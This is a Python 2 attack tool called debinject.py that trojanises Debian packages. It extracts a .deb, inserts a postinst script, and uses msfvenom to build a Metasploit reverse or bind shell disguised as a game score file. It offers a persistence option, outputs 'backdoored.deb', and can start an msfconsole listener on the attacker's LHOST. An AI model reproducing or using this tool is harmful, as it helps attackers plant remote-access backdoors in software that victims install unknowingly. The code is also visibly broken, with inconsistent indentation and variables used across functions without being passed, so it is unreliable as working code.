debinject.py

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3. #-------------------------------
4. #
5. #      BY: UNDEADSEC from BRAZIL :)
6. #      Visit: https://www.youtube.com/c/UndeadSec
7. #      Github: https://github.com/UndeadSec/EvilURL
8. #      Telegram: https://t.me/UndeadSec
9. #
10. #-------------------------------
11. BLUE, RED, WHITE, YELLOW, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;32m', '\033[0m'
12. #-------------------------------
13. from subprocess import call
14. #-------------------------------
15. def message():
16.     call('clear', shell=True)
17.     print """
18.  
19. --------------------{1}
20. ┌┬┐┌─┐┌┐ ┬┌┐┌ ┬┌─┐┌─┐┌┬┐  
21. ││├┤ ├┴┐││││ │├┤ │   │ BY: {1}Undead{2}Sec{1} from BRazil {0}
22. ─┴┘└─┘└─┘┴┘└┘└┘└─┘└─┘ ┴
23. {0} --------------------{1}
24.  
25. """.format(GREEN, END, RED, YELLOW, GREEN)
26. #-------------------------------
27. def main():
28.     call('rm -Rf output', shell=True)
29.     call("rm -Rf /tmp/evil", shell=True)
30.     print '~ / Inject malicious codes into *.deb\'s\n '
31.     print "{0}[-] Insert *.deb file path: {1}".format(YELLOW, END)
32.     file_path = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
33.     print "\n{0}[-] Insert LHOST: {1}".format(YELLOW, END)
34.     LHOST = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
35.     print "\n{0}[-] Insert LPORT: {1}".format(YELLOW, END)
36.     LPORT = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
37.     call('mkdir /tmp/evil', shell=True)
38.     call('cp ' + file_path + ' /tmp/evil/original.deb', shell=True)
39.     call('dpkg -x /tmp/evil/original.deb /tmp/evil/work', shell=True)
40.     call('mkdir /tmp/evil/work/DEBIAN', shell=True)
41. #-------------------------------
42. def setArch():
43.     print '\nInsert the target arch x86 or x64: '
44.     arch = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
45.     if arch == 'x64':
46.         call('cp Utils/x64/control /tmp/evil/work/DEBIAN')
47.         call('cp Utils/x64/postinst /tmp/evil/work/DEBIAN')
48.     elif arch == 'x86':
49.         call('cp Utils/x86/control /tmp/evil/work/DEBIAN')
50.         call('cp Utils/x86/postinst /tmp/evil/work/DEBIAN')
51.     else:
52.         print "\nChoose [x64] or [x86]"
53. #-------------------------------
54. def setPayload():
55.     print "\n - CHOOSE THE PAYLOAD -  \n[1] metasploit/linux/<arch>/shell/reverse_tcp\n[2] metasploit/linux/<arch>/meterpreter/reverse_tcp\n[3] metasploit/linux/<arch>/meterpreter/bind_tcp\n[4] metasploit/linux/<arch>/shell/bind_tcp"
56.     option = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
57.     if option == '1':
58.         call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/shell/reverse_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
59.     elif option == '2':
60.         call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/meterpreter/reverse_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
61.     elif option == '3':
62.         call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/meterpreter/bind_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
63.     elif option == '4':
64.         call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/shell/bind_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
65.     else:
66.         print "\nInvalid"
67.         call('exit', shell=True)
68. #-------------------------------
69. def setPersistence():
70.     persistence = raw_input('\nDo you want to enable persistence?(y/n) : ')
71.     if persistence.upper() == 'Y':
72.         call('cp Utils/Persistence/kernellog /tmp/evil/work/usr/games/', shell=True)
73. #-------------------------------
74. def makeEvil():
75.     call('chmod 755 /tmp/evil/work/DEBIAN/postinst', shell=True)
76.     call('cd /tmp/evil/work/DEBIAN && dpkg-deb --build /tmp/evil/work', shell=True)
77.     call('rm -Rf output/ && mkdir output', shell=True)
78.     call('mv /tmp/evil/work.deb output/backdoored.deb && chmod 755 output/backdoored.deb', shell=True)
79.     print "\n The .deb backdoored saved to: /output/backdoored.deb\n"
80.     listen = raw_input("Do you want to start listener? (y/n): ")
81.     if option != '3' and option != '4':
82.         if listen.upper() == "Y":
83.             if option == '1':
84.             call('service postgresql start', shell=True)
85.                 call('msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/' + arch + '/shell/reverse_tcp; set LHOST ' + LHOST + '; set LPORT ' + LPORT + '; run; exit -y"', shell=True)
86.         elif option == '2':
87.             call('service postgresql start')
88.                 call('msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/' + arch + '/meterpreter/reverse_tcp; set LHOST ' + LHOST + '; set LPORT ' + LPORT + '; run; exit -y"', shell=True)
89.         else:
90.             print "Bye :D"
91.     else:
92.         print "\nStart Metasploit listener and Happy Hacking"
93. #-------------------------------
94. if __name__ == '__main__':
95.     message()
96.     main()
97.     setArch()
98.     setPayload()
99.     setPersistence()
100.     makeEvil()